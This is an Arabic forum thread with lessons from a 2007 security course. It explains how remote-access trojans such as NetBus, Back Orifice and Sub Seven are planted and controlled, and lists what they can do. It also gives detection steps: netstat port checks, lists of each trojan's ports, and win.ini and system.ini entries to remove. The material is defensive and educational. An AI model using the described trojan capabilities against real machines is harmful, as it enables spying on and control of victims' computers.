C:Windowsdelete patch.*
في الحلقة الدراسية القادمة إن شاء الله سنتعلم ميكانيكية الاختراق وكيف يتم عن طريق الريموت والسيطرة على الأجهزة والأنظمة عن بعد وسنتطرق للبرامج التي تستخدم في ذلك وطريقة عملها (كيف تعمل وليس كيف يعمل بها) وأيضا سنتحدث عن الطرق التي يمكن بها إعاقة عمل تلك البرامج دون علم من الكراكرز .

Linux Root
, Tue, 26 Jun 2007 23:48:12 +0200
الدرس الثاني والثلاثين
ميكانيكية الإختراق
بدا الشغل الحلو



يعتمد الاختراق على السيطرة عن بعد Remote وهي لاتتم الا بوجود عاملين مهمين : الأول البرنامج المسيطر ويعرف بالعميل Client والثاني الخادم Server الذي يقوم بتسهيل عملية الأختراق ذاتها.
وبعبارة أخرى لابد من توفر برنامج على كل من جهازي المخترق والضحية ففي جهاز الضحية يوجد برنامج الخادم وفي جهاز المخترق يوجد برنامج العميل . تختلف طرق إختراق الأجهزة والنظم بإختلاف وسائل الإختراق ، ولكنها جميعا تعتمد على فكرة توفر إتصال عن بعد بين جهازي الضحية والذي يزرع به الخادم (server) الخاص بالمخترق ، وجهاز المخترق على الطرف الأخر حيث يوجد برنامج المستفيد او العميل Client وهناك ثلاث طرق شائعة لتنفيذ ذلك :
1) عن طريق ملفات أحصنة طروادة Trojan : لتحقيق نظرية الأختراق لابد من توفر بريمج تجسسي يتم إرسالة وزرعة من قبل المستفيد في جهاز الضحيه ويعرف بالملف اللاصق ويسمى (الصامت) أحيانا وهوملف باتش patch صغير الحجم مهمته الأساسية المبيت بجهاز الضحيه (الخادم) وهو حلقة الوصل بينه وبين المخترق (المستفيد) .
كيفية الإرسال والاستقبال :
تقوم الفكرة هنا على إرسال ملف باتش صغير هذا الملف يعرف باسم حصان طروادة لأنه يقوم بمقام الحصان الخشبي الشهير في الأسطورة المعروفة الذي ترك امام الحصن وحين ادخله اليه الناس خرج من داخلة الغزاة فتمكنوا من السيطرة والإستيلا على الحصن . ملفنا الصغير الفتاك هذا ربما يكون اكثر خبثا من الحصان الخشبي بالرواية لأنه حالما يدخل لجهاز الضحية يغير من هيئته فلو فرضنا بأن إسمه mark.exe وحذرنا منه صديق فأننا سنجده يحمل اسما اخرا بعد يوم او يومين . لهذا السبب تكمن خطورة احصنه طراودة فهي من جانب تدخل للأجهزة في صمت وهدوء ، ويصعب اكتشافها من جانب اخر في حالة عدم وجود برنامج جيد مضاد للفيروسات .
لاتعتبر احصنة طروادة فيروسات وإن كانت برامج مضادات الفيروسات تعتبرها كذلك فهي بالمقام الأول ملفات تجسس ويمكن أن يسيطر من خلالها المستفيد سيطرة تامه على جهاز الضحية عن بعد وتكمن خطورتها في كونها لاتصدر اية علامات تدل على وجودها بجهاز الخادم.
كيفية الأرسال :
تتم عملية إرسال بريمجات التجسس بعدة طرق من اشهرها البريد الألكتروني حيث يقوم الضحية بفتح المرفقات المرسلة ضمن رسالة غير معروفة المصدر فيجد به برنامج الباتش المرسل فيظنه برنامجا مفيدا فيفتحه او أنه يفتحه من عامل الفضول ليجده لايعمل بعد فتحة فيتجاهلة ظانا بأنه معطوب ويهمل الموضوع بينما في ذلك الوقت يكون المخترق قد وضع قدمه الأولى بداخل الجهاز ( يقوم بعض الأشخاص بحذف الملف مباشرة عند إكتشافهم بأنه لايعمل ولكن يكون قد فات الأوان لأن ملف الباتش من هذا النوع يعمل فورا بعد فتحة وإن تم حذفه كما سنرى فيما بعد) .
هناك طرق أخرى لزرع أحصنه طروادة غير البريد الألكتروني كأنتقاله عبر المحادثة من خلال برنامج الـ ICQ وكذلك عن طريق إنزال بعض البرامج من احد المواقع الغير موثوق بها . كذلك يمكن اعادة تكوين حصان طروادة من خلال الماكرو الموجودة ببرامج معالجات النصوص.
كيفية الإستقبال:
عند زرع ملف الباتش في جهاز الضحية (الخادم) فأنه يقوم مباشرة بالأتجاه الي ملف تسجيل النظام Registry لأنه يؤدي ثلاثة امور رئيسية في كل مرة يتم فيها تشغيل الجهاز : (1) فتح بوابة او منفذ ليتم من خلالها الاتصال (2) تحديث نفسه وجمع المعلومات المحدثة بجهاز الضحية إستعدادا لأرسالها للمخترق فيما بعد (3) وتحديث بيانات المخترق (المستفيد) في الطرف الأخر . تكون المهمة الرئيسية لملف الباتش فور زرعة مباشرة فتح منفذ إتصال داخل الجهاز المصاب تمكن برامج المستفيد (برامج الإختراقات) من النفوذ. كما أنه يقوم بعملية التجسس بتسجيل كل مايحدث بجهاز الضحية او انه يقوم بعمل اشياء اخرى حسب مايطلبه منه المستفيد كتحريك الماوس او فتح باب محرك السي دي وكل ذلك يتم عن بعد.
بوابات الأتصال Ports
يتم الاتصال بين الجهازين عبر بوابات ports او منافذ اتصال وقد يظن البعض بأنها منافذ مادية في امكانه رؤيتها كمنافذ الطابعة والفأرة ولكنها في واقع الأمر جزء من الذاكرة له عنوان معين يتعرف علية الجهاز بأنه منطقة إتصال يتم عبره ارسال واستقبال البيانات ويمكن استخدام عدد كبير من المنافذ للأتصال وعددها يزيد عن 65000 يميز كل منفذ عن الاخر رقمه فمثلا المنفذ رقم 1001 يمكن اجراء اتصال عن طريقة وفي تفس اللحظه يتم استخدام المنفذ رقم 2001 لإجراء اتصال اخر.
التواصل :
قلنا بأن المخترق قد تمكن من وضع قدمة الأولى بداخل جهاز الضحية بعد زرع ملف الباتش به ورغم خطورة وجود هذا الملف بجهاز الضحية فأنه يبقى في حالة خمول طالما لم يطلب منه المخترق التحرك فهو مجرد خادم ينفذ مايصدر له من اوامر ولكن بدونه لايتمكن المخترق من السيطرة على جهاز الضحية عن بعد ، وحتى يتم له ذلك، فإن على المخترق بناء حلقة وصل متينه بينه وبين الخادم عن طريق برامج خاصة تعرف ببرامج الإختراق . من جانب اخر تبقى احصنة طروادة عديمة الفائدة إن لم يتمكن المخترق من التعامل معها وهي تفقد ميزتها الخطرة حالما يتم اكتشافها والتخلص منها كما اوضحت بالحلقة الدراسية السابقة. وهناك عامل ممتاز يساهم في تحقيق هذة الميزة فبرامج مضادات الفيروسات الجيدة تكتشف ملفات الباتش الحاملة لأحصنة طروادة وتمنعها من الدخول للأجهزة لهذا يؤكد كل من له المام بالمعلوماتية أن تزود دائما الأجهزة الشخصية ببرامج مضادات الفيروسات وتحديثها بين الحين والأخر لأنها الخطوة الأولى للوقاية من الأختراقات ، كذلك علينا أن نتعود على عدم تمكين عامل الفضول من الولوج الي انفسنا فلانفتح اية مرفقات للبريد الألكتروني مجهول المصدر مهما كانت المغريات.
2) عن طريق الـ IP Address : ذكرت بأن ملفات الباتش الحاملة لأحصنة طروادة هي حلقة الوصل بين المخترق والضحية ، ولكن في واقع الأمر فإن ملفات الباتش ليست إلا طريقة واحدة لتحقيق التواصل . عند إتصالك بالأنترنت تكون معرض لكشف الكثير من المعلومات عنك كعنوان جهازك وموقعه ومزود الخدمة الخاص بك وتسجيل كثير من تحركاتك على الشبكة. ولاتتعجب كثيرا حين تعلم بأن كثيرا من المواقع التي تزورها تفتح سجلا خاصا بك يتضمن عنوان الموقع الذي جئت منه IP Address ونوع الكمبيوتر والمتصفح الذي استخدمته بل وحتى نوع معالج جهازك وسرعته ومواصفات شاشاتك وتفاصيل كثيرة.
كيف تم معرفة كل ذلك ؟ يمكنك التحقق من هذا السؤال لو انك زرت الموقع التالي :
http://www.privacy.net/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.privacy.net/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.privacy.net/%27)
او الموقع التالي :
http://www.consumer.net/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.consumer.net/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.consumer.net/%27)
بعد التسجيل اطلب من احد الموقعين فحص جهازك اثناء اتصالك بالأنترنت وستفاجأ بالنتيجة .
مبدئيا عنوانك الخاص بالأنترنت Internet Protocol او IP يكشف الكثير عنك فكل جهاز متصل بالشبكة يكون له رقم معين خاص به يعرف بأسم الـ IP Address وكل عنوان لموقع على الأنترنت يترجم الي IP Address الخاص بمزود الخدمة وبأختصار يكون الـ IP كرقم هوية خاص بكل من يعمل على الأنترنت. حينما يتمكن مخترق محترف من معرفة رقم الـ IP الخاص بالضحية فأنه من خلالة يتمكن من الولوج الي الجهاز والسيطرة عليه خلال الفترة التي يكون فيها الضحية متصلا بالشبكة فقط ، ولكن هذا الخيار لايخدم المخترق كثيرا لأن السيرفر الخاص بمزود الخدمة يقوم بتغيير رقم الـ IP الخاص بالمشترك تلقائيا عند كل عملية دخول للشبكة . يمكنك أن تجرب ذلك بنفسك بالطريقة التالية:
أثناء إتصالك بالشبكة ومن قائمة إبداء إختر تشغيل واكتب الأمر التالي في المستطيل الظاهر : winipcfg سيظهر لك عنوان الـ IP اكتبه في ورقة صغيرة واقطع اتصالك . أعد الأتصال مرة اخرى بالشبكة وقم بالأجراء السابق ستجد أن عنوان الـ IP الخاص بك قد تغير.
3) عن طريق الكوكي Cookie :
يمكن ايضا تحقيق التواصل للأختراق عن طريق الكوكي Cookie وهي عباراة عن ملف صغير تضعة بعض المواقع التي يزورها المستخدم على قرصة الصلب . هذا الملف به اليات تمكن الموقع الذي يتبع له جمع وتخزين بعض البيانات عن الجهاز وعدد المرات التي زار المستخدم فيها الموقع كما وأنها تسرع عمليات نقل البيانات بين جهاز المستخدم والموقع فالهدف الأساسي منها هو تجاري ولكنه يساء إستخدامة من قبل بعض المبرمجين المتمرسين بلغة الجافا Jafa فهذة اللغة لديها قدرات عالية للتعمق اكثر لداخل الأجهزة والحصول على معلومات اكثر عن المستخدم. لايفضل منع الكوكيز كليا ولكن يمكن فلترتها من خلال المتصفح او ببعض البرامج كالجارد دوق . وبعد فإن ميكانيكية الأختراق تتم مبدئيا بوضع بريمج الخادم بجهاز الضحية ويتم الأتصال به عبر المنفذ port الذي فتحة للمستفيد (المخترق) في الطرف الأخر ولكن حلقة الوصل هذة تنقصها المعابر وهي البرامج المخصصة للأختراق وهذة الأخيرة سأتطرق اليها في الحلقة الدراسية القادمة إن شاء الله حيث سأشرح كيف تعمل برامج الأختراق ، وكيف علينا أن نتعامل معها ، وكيف نوهم المخترق بنجاح إختراقة بينما هو يجري خلف سراب

مـصـطـفـى الـمـلـك
, Wed, 27 Jun 2007 11:33:38 +0200
طبـعـا يـشرفني
ان اكـون اول من يـرد علـى هذا الموضوع الـروعـه
عـاشـت ايــدك
صـدك موضوع
مفـيـد ومضـبوط
تحيـاتي الـك

Linux Root
, Wed, 27 Jun 2007 14:41:53 +0200
الدرس الثالث والثلاثين
البرامج المؤذية - Harmful Software

الاختراق ليس الا احد انواع التدمير الممكنه عبر البرامج المؤذية ، لذلك فالمخاطر التي يتعرض لها مستخدم الكمبيوتر العادي تتنوع بتنوع واختلاف البرامج المؤذية وامكاناتها وإن كان الاختراق هو اخطرها وابرزها.
المخاطر وانواع البرامج المؤذية:
تتراوح المخاطر التي يتعرض لها المستخدم من مجرد ازعاج بسيط الي مستوى الكارثة وقد صنف المؤلفين الثلاثة هذة المخاطر الي اربعة اصناف:
1- القتابل وبرامج الطوفان Flooders/Bombers حيث يفاجأ المستخدم بوجود مئات الرسائل في عنوانه الألكتروني او عبر برنامج الـ ICQ من اشخاص وعناوين لم يسمع بهم من قبل وهذا الصنف من المخاطر هو الأقل خطوره حيث انه يسبب ازعاجا ومضيعا للوقت لا اكثر .
2- الخداع Spoofing شرحت هذا الخطر سابقا وهو عملية تمويه وطمس للهويه حيث تتم سرقة حساب الدخول للأنترنت بأسم المستخدم فيجد ساعاته تنقص دون ان يستخدمها او يتم من خلالة سرقة كلمة السر في ساحات الحوار فتكتب مقالات لم يكتبها في حقيقة الأمر المستخدم الحقيقي.
3- التدمير من خلال برامج الـ Nukers تقوم هذة البرامج بتعطيل نظام التشغيل ويتراوح خطرها بين تغيير الوقت بساعة النظام وبين توقف النظام كليا عن العمل وتوجد انواع منها تركز على برنامج معين لتدميره دون الحاق الضرر بنظام التشغيل ذاته.
4- الباب الخلفي Backdoor هذا الصنف هو الأخطر وهو المحور الذي يدور حوله موضوع هذة الدوره الدراسية ، وهو الشائع بين كل المخترقين لأنه يجعل المخترق قادرا على الدخول لجهاز الضحية والسيطره عليه كليا او جزئيا بحسب البرنامج المستخدم . البعض يظن خطأ بأن الـ Backdoor اسم برنامج للأختراق ولكنه تعبير مجازي ويعني بالعربية الدخول من الباب الخلفي الغير مرئي وعن طريقة يتم دخول المخترقين لجهاز الضحية .
أشهر برامج الأختراق وكيفية عمل كل منها:
كثيرة هي برامج الأختراق ومتعدده ولكن هناك نظرية سائدة تشمل الجانب النفسي للمخترقين وهي البساطة في التعامل مع برنامج الأختراق والحصول على ما خف وزنه وغلاء ثمنه من جهاز الضحيه Easy to Go ، وبمعنى أخر فأن المخترق لايرغب في برنامج معقد يأخذ كثيرا من الوقت في تعلمه وكذلك لايرغب بعد تعلم البرنامج واتقانه الدخول الي جهاز خاوي لاسمن فيه ولاعسل . لهذا السبب نجد بأن هناك ثلاثة برامج شهيرة ومعروفة يستخدمها المخترقون في كل أرجاء المعمورة لبساطة تعلمها وسهولة إتقانها وفي نفس الوقت خطورة ما تقوم به . هذة البرامج الثلاث سأشرحها بالتفصيل مركزا على ثلاثة عوامل فيهم (1) إمكانات كل برنامج (2) كيفية إكتشافة في الأجهزة (3) كيفية التخلص منه وجعل المخترق يجري خلف سراب .
برامج الأختراق المتداولة:
هذة قائمة بأشهر البرامج المتداولة مرتبة حسب خطورتها ، وسأكتفي بشرح الثلاثة الأولى منها لشهرتها وتداولها بين المخترقين في ارجاء المعمورة قاطبة:
1- Net Bus
2- Back Orifice
3- Sub Seven
4- Hack a Tack
5- Master Paradise
6- Deep Throat
7- Girl Friend
8- Net Sphere
9- Win Crash
10- Big Cluck
11- Executer
1- برنامج الـ Net Bus : تمكن مبرمج سويدي إسمه كارل نيكتر في عام 1998 من إصدار نسخة تجريبيه تعمل على الويندوز 95 من برنامج لم يطلق عليه اسما وقتها . ذلك البرنامج يمكن مستخدمه من تشغيله بواسطة كمبيوتر بعيد (ريموت) بنفس الفكرة التي ذكرتها في الفصل السابق هذا البرنامج سماه اتوبيس الشبكة Net Bus صدرت بعد ذلك نسخ عديده منه اذكر منها نسخة 1.6 و 1.7 و Net Bus Pro وأخيرا Net Bus 2000 .
إمكانات برنامج Net Bus : يسمح البرنامج لأي شخص بالسيطرة على جهاز الضحية عن بعد (ريموت) بالشكل التالي:
1- عرض صورة مفاجئة على شاشة الضحية او تغيير اعدادات الشاشة دون تدخل من المستخدم
2- استبدال مفاتيح الماوس الأيمن والايسر
3- تشغيل برنامج معين بصورة مفاجئة
4- فتح و غلق باب سواقة الـ CD تلقائيا دون تدخل من المستخدم
5- عزف اي ملف صوتي فجأه
6- وضع مؤشر الماوس في نطاق معين من الشاشة لا يستطيع المستخدم ان يتعداه
7- تحريك مؤشر الماوس دون ان يفعل ذلك المستخدم الاصلي
8- عرض رسالة قصيرة على الشاشة تختفي فجأة او تبقى معلقة دائما بالشاشة لايستطيع المستخدم التخلص منها.
9- قفل واعادة تشغيل الجهاز Rebooting بطريقة مفاجئة
10- الذهاب الي موقع معين على الويب
11- التجسس على المستخدم ورؤية اية كلمات يكتبها
12- التقاط صور لسطح المكتب عن بعد
13- ارسال معلومات لكومبيوتر المخترق عبر بريمج الباتش المزروع بجهاز الضحية
14- عرض محتويات القرص الصلب بالكامل عن بعد
15- انزال downloading اي ملف من جهاز الضحية لجهاز المخترق
16- تحميل upload اي ملف من جهاز المخترق لجهاز الضحيه
17- التحكم في علو وانخفاض الصوت
18- في حالة ارتباط مايكروفون بجهاز الضحية فيمكن للمخترق الأستماع لما يدور من حديث بالغرفة المتواجد بها جهاز الضحية
19- حذف اي ملف من القرص الصلب عن بعد
20- الغاء disable عمل مفاتيح معينه من لوحة المفاتيح
21- اقفال اي نافذة من النوافذ المفتوحة بشاشة الضحية
22- فتح نوافذ معينه بطريقة مفاجئة
23- اضافة كلمة سر لجهاز الضحية تمنعه من الدخول لجهازه
24- تغيير او حذف كلمات السر الخاصة بالضحية واستبدالها بكلمات اخرى
25- تغيير اعدادات النظام بالجهاز الخاص بالضحيه كل هذة الوظائف السابقة يمكن لأي مخترق لديه هذا البرنامج او اي برنامج للأختراقات مع اختلاف قدراتها أن يستخدمها على كمبيوتر الضحية المزروع به الملف الخادم (ملف الباتش).
قد يسبب ما ذكرت اعلاه شئ من الخوف او الوسوسة لمن ظهر في جهازه احد او بعض الأعراض المذكوره ولكني انصحه ان لا يستعجل الأمور وقبل اتخاذه لأي قرار عليه اولا الكشف على جهازه والبحث عن اي ملف تجسسي مزروع به عن طريق الوسائل الثلاث التي ذكرتها في الفصل الأول . هذا من جانب ، اما جانب اخر فأن المخترق لكي يتمكن من الأختراق عليه الدخول من احد المنافذ ports والبرامج المضادة للمخترقين والتي ساشرحها في الفصل الثالث إن شاء الله كفيلة بأغلاق تلك المنافذ في وجه المخترق ولكن حتى نقطع الطريق هنا على المخترق فإليكم طريقة فذة لأكتشاف المنافذ المفتوحة واغلاقها بطريقة يدويه من خلال الويندوز ويجب تنفيذ هذا الأجراء اثناء الإتصال بالأنترنت online :
1- من قائمة إبداء اختر تشغيل
2- عند ظهور مربع الحوار الخاص بتنفيذ الأوامر اكتب Command
3- سيظهر لك اطار نظام التشغيل دوس وفي داخل الأطار وامام خانة المؤشر اكتب : netstat-a ثم اضغط Enter
4- عند تنفيذ الخطوة السابقة سيتم عرض جميع المنافذ المفتوحة بجهازك وهي التي تلي الرمز (: ) مباشرة ، أما ماقبل الرمز فهو اسم الكمبيوتر الخاص بك الذي تم تعريفه عند تجهيز شبكة الأتصال .
5- والأن قارن ارقام المنافذ التي ظهرت لك مع ارقام المنافذ التالية وهي المنافذ التي يفتحها في العادة ملف التجسس (الباتش) لبرنامج الـ Net Bus فإن وجدت رقم المنفذ ضمنها فإن جهازك قد أخترق وعليك في هذة الحالة التخلص اولا من ملف التجسس كما تم شرحة في الفصل السابق ثم اغلاق المنفذ
المفتوح كما سيتم شرحة لاحقا:
منافذ Ports دخول برنامج النت باص :
20034
1045
4590
6711
7300
7301
7306
7303
7308
30029
30100
30101
30102
31337
31338
31339
التخلص من برنامج النت باص واغلاق منافذه المفتوحة: الرابط الرئيسي بين كمبيوتر المخترق وكمبيوتر الضحية هو ملف التجسس المزروع بالأخير ومتى ماتم تحديده والتخلص منه قطعت عليه سبل التجسس اما المنافذ التي فتحت فهي كما شرحناها بالفصل السابق جزء من الذاكرة يتعرف عليها الجهاز بانها منطقة اتصال ومتى ما تم حذف ملف التجسس (الباتش) فأن الويندوز يعيد اغلاق تلك المنافذ عقب اعادة تشغيل الجهاز لأن مصدرها (ملف الباتش) قد قضي عليه.
2- برنامج Black Orifice : الفجوة السوداء ثاني اشهر برنامج للأختراق وأقدمها يعطي سيطرة كاملة للمخترق وابرز اصدارته السابقة يحمل النسخة رقم 1.2 وقد أصدرت الجمعية التي تصدرة وأسمها "جمعية البقرة الميته" Cult of Death Cow اعلانا بأطلاق اصدارة جديدة منه في نهاية الصيف السابق سمته Black Orifice 2000 . يقوم البرانامج كما ذكرنا بأعطاء سيطرة كاملة للمخترق وتظهر بجهاز الضحية نفس الأعراض التي ذكرتها سابقا .
البحث عن منافذ دخول هذا البرنامج:
قم بأجراء البحث عن المنافذ كما تم شرحه اعلاه التي عادة يدخل منها برنامج الـفجوة السوداء وقارنها بالمنافذ في القائمة ادناه فإن وجدتها من ضمن هذه القائمة فأن جهازك يكون قد اخترق عن طريق هذا البرنامج:
31338
31337
31666
54320
54321
أكتشاف ملف التجسس الخاص بهذا البرنامج:
قم بنفس الأجراء الذي شرحته بالفصل الأول للكشف عن ملف الباتش وبعد الدخول لملف تسجيل الويندوز توقف عند Current Version . الأن أنقر على المجلد RunServices وابحث عن اي ملف غريب بجهازك له امتداد exe ( أنت اعرف بجهازك من الأخرين) . إن وجدت اي ملف غريب لم تشاهده بجهازك من قبل فأنقر عليه بزر الماوس الأيمن ثم احذفه واخرج من ملف تسجيل الويندوز . اعد تشغيل الجهاز وتوجة الي مجلد الـ System في اعدادات بقائمة إبداء. الأن ابحث عن ملف يحمل نفس اسم الملف الغريب الذي حذفته وإذا لم تجده فأنقر قائمة (عرض) ثم ( خيارات المجلد) ثم (عرض) من قائمة الملفات المختفيه ثم ضع علامه على (اظهار جميع الملفات) ثم انقر تطبيق فموافق. ستعود مرة اخرى الي مجلد System فإذا وجدت الملف المطلوب فقم بمسحة وستجد ملفا اخر اسمه windll.dll قم بحذفه هو ايضا واعد تشغيل الجهاز . الأن تكون قد قطعت الطريق على المخترق وجعلته يبحث عن سراب.
3- برنامج Sub Seven : من اشهر البرامج المستخدمة بمنطقة الخليج ، يسمونه "القنبله" وهو مرغوب ومطلوب وشعبي لبساطته وسهولة تعلمه وسهولة الأختراق عن طريقة . يتميز بمخادعة الشخص الذي يحاول ازالته فهو يعيد تركيب نفسه تلقائيا بعد حذفه من ملف التسجيل بالويندوز بالطرق الثلاث التي ذكرتها في الفصل السابق ولكن هناك طريقة جديدة وخارقه لحذفه سأشرحها لاحقا.
قبل شرح اعراض الاصابة التي يتركها هذا البرنامج بجهاز الضحية تأكد اولا من عدم فتح منافذ الاتصال الخاصة به في جهازك بنفس الطريقة السابقة وقارنها بالمنافذ التاليه فإن وجدتها فأن جهازك حتما مصاب وعليك متابعة الموضوع للتخلص من المخترق:
6711
6776
1243
1999
أعراض الأصابة :
تختلف اعراض اصابه هذا البرنامج عن البرنامجين السابقين فمن أهم أعراض اصابه هذا البرنامج ظهور رسالة شهيرة عند كل مرة يدخل فيها المخترق لجهاز الضحيه وهي ( قام هذا البرنامج بأنجاز عملية غير شرعيه ....) !! تريثوا .. لايعني من رأى منكم هذة الرسالة على شاشته أن جهازه قد اخترق .. قلنا بأن في هذا البرنامج الكثير من الخبث مما جعله مرغوبا خصوصا بمنطقة الخليج ، فهو حينما يعطي رسالة كهذه إنما يوهم المخترق بـأن هذه الرسالة شائعة ومعروفه ومن تظهر له فقد تعود عليها فلن يشك مطلقا قبل قراءة هذه الأسطر في أن جهازه قد اخترق . كيف نميز بين الرسالة الصادقة البريئة والرسالة الكاذبه الخبيثة؟؟
1- افتح ملف الـ win.ini الموجود بمجلد الويندوز وابحث في بداية السطور الأولى عن اي قيم شبيهة بالقيم التاليه:
run = xxxx.exe او run = xxxx.dl
load = xxxx.exe او load = xxxx.dl
لاحظ أن xxxx تعني اسم الخادم فإذا عثرت على اي قيمة منها فأحذفها فورا وبمعنى اخر يجب أن لايظهر اي سطر من السطور اعلاه في بداية السطور الأولى لملف الـ win.ini فإن ظهر فأحذفه على الفور.
2- افتح الملف system.ini الموجود بمجلد الويندوز وستجد بالسطر الخامس العبارة التالية :
Shell = Explorer.exe
إن كان جهازك مصابا فستجد شكل العبارة السابقة يكون هكذا:
Shell = Explorer.exe xxx.exe او shell = Explorer.exe xxx.exe
مع العلم بأن xxx هو اسم الخادم زمن اشهر اسمائة : rundlll6.exe و
Task_Bar.exe
أن وجدت جهازك مصابا فقم بمسح اسم الخادم فقط ليصبح السطر كما يلي :
shell=Explorer.exe
والأن انت تكون قد قطعت الطريق بين ملف التجسس واسم الخادم الخاص به ونشبه ذلك بمن قطع جهاز التنفس عن المريض فلا يبقى الا دفنه وعليك القيام بحذف ملف التجسس الخاص بهذا البرنامج كما تم شرحة في الفصل الأول . وبعد فكما رأينا خطورة الأختراق فإن الوقاية خير من العلاج والوقاية الأولى هي عدم السماح بزرع ملفات التجسس في اجهزتنا فهي حلقة الوصل الأولى لدخول المخترقين اليها . في الحلقة الدراسية القادمة إن شاء الله سأشرح طرق الوقاية بتفصيل اكثر وسنتعلم كيفية استخدام البرامج المضادة لبرامج الاختراقات التي تم شرحها اليوم وايضا سنصل لمحور حديث هذة الحلقات الدراسية وهو الدفاع الذاتي

Linux Root
, Wed, 27 Jun 2007 14:45:18 +0200
الدرس الرابع والثلاثين

مع التطور المستمر لطرق واساليب الاختراق ، كان لزاما ان تتطور في مقابلها وسائل وطرق للحماية. ولأهمية هذا الموضوع بالنسبة للمسؤولين عن الأنظمة والمزودات فقد كان الاهتمام بأمن وحماية المزودات من المخاطر الأمنية كبير جدا ولا تخلوا اليوم شركة من قسم يختص بأمن وسلامة المعلومات .
ولكن في المقابل حينما نتحدث عن حماية الأجهزة الشخصية- وهو المحور الرئيسي لهذه الدورة الدراسية- نجد بأن هناك قصورا كبيرا من المستخدمين في حماية اجهزتهم وهوعامل اصبح لزاما على كل المستخدمين إدراكه من خلال ما تم شرحة في الحلقات الدراسية السابقة . وقد انتشرت برامج الحماية والبرامج المضادة للاختراقات انتشارا كبيرا قد يصاب معه المستخدم بالحيرة فيما يختاره منها خصوصا اذا ما ادركنا بأن بعض – وليس كل تلك البرامج- تقوم هي ذjنها بأنشطه تجسسية لصالح الشركة المصنعه لها ولكنه لا يكون سواء تجسس إحصائي لمعرفة عدد المستخدمين للبرنامج المذكور ، اما مانسمعه من وجود برامج للحماية تقوم تلقائيا بفتح منافذ معينه بالأجهزة فأن هذا لم يثبت بعد في تقارير رسمية والشركات تدرك اليوم بأن المستخدم العادي وفي اي بلد كان على جانب كبير من الوعي الذي يؤهله لأكتشاف الثغرات الأمنيه بالبرنامج –ان وجدت- وشركات كتلك تهمها السمعه اولا وأخيرا لأن ذلك يتوقف عليه نجاحها في السوق وبالتالي مكسبها وخسارتها.
طرق برامج الحماية :
للحماية من الاختراقات والتجسس هناك عدة طرق تستخدمها برامج الحماية لأداء مهامها ويمكن تصنيف هذه الطرق الي اربعة على النحو التالي:
1- تخزين قاعدة بيانات بالبرنامج تخزن فيه عدد كبير من اسماء احصنه طرواده ويتم عمل مسح لكافة الملفات الموجودة بجهاز المستخدم ومطابقتها مع الموجود بقاعدة البيانات تلك للتعرف على الملفات المطابقه . يتم تحديث قاعدة البيانات دوريا اما من خلال الاقراص اللينه التي تحدث اولا بأول كما كانت تفعل سابقا شركة مكافي ببرنامجها الشهير انتي فيروس او يتم ذلك مباشرة من خلال الانترنت كما يفعلا نورتون ومكافي في الوقت الحالي .
2- البحث عن وجود تسلسل محدد من الرموز التي تميز كل ملف تجسسي والتي تميز احصنه طروادة وغيرها وهذا الملف يعرف تقنيا بأسم Signature وايضا هذة الطريقة تحدث دوريا كما تم شرحه اعلاه .
3- الكشف عن التغيرات التي تطرأ على ملف التسجيل Registry وتوضيح ذلك للمستخدم لمعرفة ان كان التغيير حصل من برنامج معروف او من حصان طرواده. هذه الطريقة يتبعها برنامج اللوك داوون الشهير.
4- مراقبة منافذ الاتصالات بالجهاز (اكثر من 65000 منفذ) لأكتشاف اي محاولة غير مسموح بها للأتصال بالجهاز المستهدف وقطع الاتـصال تلقائيا واعطاء تنبيه بذلك في حالة وجود محاولة للأختراق . هذة هي طريقة برنامج الجامر المعروف .
سنتاول في هذة الحلقة الدراسية بعض اشهر البرامج المستخدمه للحماية وسنكتفي بشرح الثلاثة الاولى منها لشيوعها بين المستخدمين التقليديين :
1- برنامج Lock Down 2000
الشركة المنتجة : Harbor Telco Security Corp.
الموقع على الأنترنت : http://www.lockdown2000.com/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.lockdown2000.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.lockdown2000.com/%27)
الحجم : 2 MB
السعر: $ 99
المحاسن : برنامج قوي وشامل للحماية الفردية
العيوب: تنطلق صفارة التحذير عند كل تغيير يحدث بلمف الـ Registry وعند استقبال الكوكيز الغير مضرة للمواقع التي تتم زيارتها. اشهر البرامج المستخدمه للحماية ، يعمل كجدار ناري حيث يقوم بفحص الجهاز عند بدء التشغيل للبحث عن احصنة طروادة ومن ثم الغاء الملف مباشرة مع ترك رسالة تعلم المستخدم بذلك . يمنع كذلك المخترقين ويسجل محاولات الدخول في تقرير مختصر يشمل وقت الدخول وعنوان الـ IP كما انه يعطي معلومات عن جهة الأتصال والبلد.
ملحوظة : اشارت بعض التقارير التي نشرت بكتاب Firewalls and Internet Security الي ان هذا البرنامج قد قام بفتح المنفذين رقمي 12345 و 1243 ببعض الأجهزة المحدوده بالولايات المتحدة خلال عام 1999 ولكن هذة الأتهامات لم تثبت بشكل قاطع كما ان الشركة المنتجه لم تعلق على الموضوع كما ذكر المؤلفين .
2- برنامج Jammer
الشركة المنتجة : Jammersoft Corp.
الموقع على الأنترنت : http://start.at/jammer/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://start.at/jammer/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://start.at/jammer/%27)
الحجم : 1.6 MB
السعر : $ 19.95
المحاسن : مراقبة تامة لكافة المنافذ (65000) في وقت واحد
